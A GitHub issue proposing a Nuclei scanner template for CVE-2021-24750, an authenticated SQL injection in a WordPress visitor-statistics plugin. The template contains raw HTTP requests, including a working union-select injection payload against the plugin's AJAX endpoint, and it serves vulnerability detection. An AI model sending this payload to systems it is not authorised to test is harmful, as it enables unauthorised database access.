### ISSUE TITLE
WP Visitor Statistics (Real Time Traffic) WordPress plugin before 4.8 SQLI Poc

### ISSUE THREAD

**Issue by cckuailong** [projectdiscovery/nuclei-templates#3583]
### Template Information:

WP Visitor Statistics (Real Time Traffic) WordPress plugin before 4.8 SQLI

### Nuclei Template:

```yaml
id: CVE-2021-24750

info:
  name: WP Visitor Statistics (Real Time Traffic) WordPress plugin before 4.8 SQLI
  author: cckuakilong
  severity: high
  description: The WP Visitor Statistics (Real Time Traffic) WordPress plugin before 4.8 does not properly sanitise and escape the refUrl in the refDetails AJAX action, available to any authenticated user, which could allow users with a role as low as subscriber to perform SQL injection attacks.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2021-24750
    - https://github.com/fimtow/CVE-2021-24750/blob/master/exploit.py
  tags: cve,cve2021,sqli
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2021-24750
    cwe-id: CWE-89

requests:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0
        Accept-Encoding: gzip, deflate
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
        Host: {{Hostname}}
        Accept-Language: de,en-US;q=0.7,en;q=0.3
        Content-Type: application/x-www-form-urlencoded
        Origin: http://{{Hostname}}
        Upgrade-Insecure-Requests: 1
        Cookie: wordpress_test_cookie=WP%20Cookie%20check
        Content-Length: 47
        Connection: close

        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1

      - |
        GET /wp-admin/admin-ajax.php?action=refDetails&requests=%7B%22refUrl%22:%22'%20union%20select%201,1,md5(1),4--%20%22%7D HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0
        Accept-Encoding: gzip, deflate
        Accept: */*
        Connection: close

    payloads:
      username:
        - user
      password:
        - user
    attack: clusterbomb

    cookie-reuse: true

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "c4ca4238a0b923820dcc509a6f75849b"

      - type: status
        status:
          - 200
```

Have test it.
![image](https://user-images.githubusercontent.com/10824150/150665867-f0d67b22-1d6d-43ee-8f78-366c57f39039.png)

vulnerable app: https://github.com/fimtow/CVE-2021-24750
